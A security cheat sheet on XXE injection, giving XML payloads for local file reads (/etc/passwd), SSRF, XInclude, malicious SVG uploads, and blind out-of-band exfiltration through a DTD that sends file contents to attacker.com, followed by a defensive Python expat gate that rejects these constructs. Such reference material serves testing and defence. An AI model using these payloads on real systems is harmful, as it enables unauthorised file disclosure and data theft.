# XML external entity (XXE)

> An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/XML_external_entity_attack)

* [PortSwigger - Web Security Academy - XML external entity (XXE) injection](https://portswigger.net/web-security/xxe)

Generally, XXE vulnerabilities arise when the application's XML parser is configured to resolve external entities and/or process `XInclude`.

## Retrieve files

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>
```

## SSRF

```xml
<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>
```

## XInclude

You may be able to use `XInclude` when you don't have control over the `DOCTYPE` element, e.g. in SOAP requests.

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

## File uploads

Sometimes XML-based files such as SVG or DOCX can be uploaded and are then processed by the app.

E.g. [XML External Entity (XXE) Injection in Apache Batik Library \[CVE-2015-0250\]](https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/)

```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text>
</svg>
```

## Blind XXE

You can use out-of-band application security testing (OAST) to detect blind XXE vulnerabilities (e.g. using Burp Collaborator).

```xml
<!DOCTYPE oast [ <!ENTITY xxe SYSTEM "https://attacker.com"> ]>
```

Via parameter entities:

```xml
<!DOCTYPE oast [ <!ENTITY % xxe SYSTEM "https://attacker.com"> %xxe; ]>
```

### Exfiltrate data

Create a `malicious.dtd` file, hosted on attacker controlled system:

```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```

XXE payload on target:

```xml
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>
```

### Retrieve data via error message

Create a `malicious.dtd` file, hosted on attacker controlled system:

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

XXE payload on target:

```xml
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>
```

## Modified content type

Some apps accept `text/xml` as the content type of POST requests instead of e.g. `application/x-www-form-urlencoded`.\
If so, malicious XML can be sent to and will be processed by the app, and it may be exploitable that way.
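A defender-side pre-parse gate that covers the vectors listed on this page (DOCTYPE and entity declarations, external DTD subsets, external entity references, XInclude elements) before any application parser touches the document. This is an added example, not part of the original cheat sheet; it uses only the Python standard library's expat bindings, and the `check_xml`/`Verdict`/`UnsafeXML` names are my own.

```python
from dataclasses import dataclass
from typing import Optional
from xml.parsers import expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

class UnsafeXML(Exception):
    """Raised from a handler the moment a disallowed construct appears."""

@dataclass
class Verdict:
    ok: bool
    reason: Optional[str]  # why the document was rejected, None if accepted
    root: Optional[str]    # root element name, filled in only on success

def check_xml(data: bytes, allow_dtd: bool = False) -> Verdict:
    """Reject any DOCTYPE by default.  allow_dtd=True tolerates an internal
    subset but still rejects external subsets, entity declarations and refs."""
    parser = expat.ParserCreate(namespace_separator=" ")
    seen = {"root": None}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXML(f"DOCTYPE '{name}' not allowed")
        if sysid or pubid:
            raise UnsafeXML(f"external DTD subset {sysid or pubid!r}")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"{'parameter' if is_param else 'general'} entity declaration '{name}'")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity reference to {sysid!r}")

    def on_start(name, attrs):
        # With namespace_separator=" " expat reports names as "<ns> <local>".
        seen["root"] = seen["root"] or name
        if name.startswith(XINCLUDE_NS + " "):
            raise UnsafeXML(f"XInclude element href={attrs.get('href')!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except UnsafeXML as e:
        return Verdict(False, str(e), None)
    except expat.ExpatError as e:
        return Verdict(False, f"malformed XML: {e}", None)
    return Verdict(True, None, seen["root"])
```

Run the page's payloads through `check_xml` to see each one rejected with the offending construct named; a gate like this is cheap defence in depth in front of a parser whose entity handling you do not fully control.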
